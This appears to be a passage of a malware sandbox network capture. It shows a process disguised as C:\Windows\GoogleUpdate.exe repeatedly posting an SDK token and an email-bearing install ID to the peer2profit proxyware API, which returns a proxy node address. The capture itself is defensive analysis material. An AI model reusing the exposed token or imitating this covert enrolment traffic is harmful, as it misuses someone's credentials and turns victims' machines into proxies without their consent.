2022-11-24 11:21:08 UTC	28	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:08 UTC	29	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:08 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2655bad9a3c-FRA
2022-11-24 11:21:08 UTC	29	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.3	49840	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:09 UTC	29	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:09 UTC	29	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:09 UTC	29	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:09 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c267fff09235-FRA
2022-11-24 11:21:09 UTC	29	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.3	49843	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:09 UTC	30	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:09 UTC	30	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:09 UTC	30	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:09 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c26a0abd68f8-FRA
2022-11-24 11:21:09 UTC	30	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.3	49846	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:10 UTC	30	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:10 UTC	30	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:10 UTC	31	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:10 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c26e4ed79070-FRA
2022-11-24 11:21:10 UTC	31	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.3	49850	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:10 UTC	31	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:10 UTC	31	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:10 UTC	31	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:10 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c27179695b6e-FRA
2022-11-24 11:21:10 UTC	31	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.3	49853	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:11 UTC	32	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:11 UTC	32	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:11 UTC	32	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:11 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2748f089b9a-FRA
2022-11-24 11:21:11 UTC	32	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.3	49856	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:11 UTC	32	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:11 UTC	32	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:11 UTC	33	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:11 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c277582cbbef-FRA
2022-11-24 11:21:11 UTC	33	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.3	49859	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:11 UTC	33	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:11 UTC	33	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:11 UTC	33	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:11 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c2799bdd9ba6-FRA
2022-11-24 11:21:11 UTC	34	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49723	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:48 UTC	3	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:48 UTC	3	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:48 UTC	3	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:48 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c1e73b2990c4-FRA
2022-11-24 11:20:48 UTC	3	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.3	49862	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:12 UTC	34	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:12 UTC	34	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:12 UTC	34	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:12 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c27c1da19054-FRA
2022-11-24 11:21:12 UTC	34	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.3	49865	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:12 UTC	34	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:12 UTC	35	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:21:12 UTC	35	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:21:12 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c27e9b61bbe5-FRA
2022-11-24 11:21:12 UTC	35	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.3	49867	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:21:13 UTC	35	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:21:13 UTC	35	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
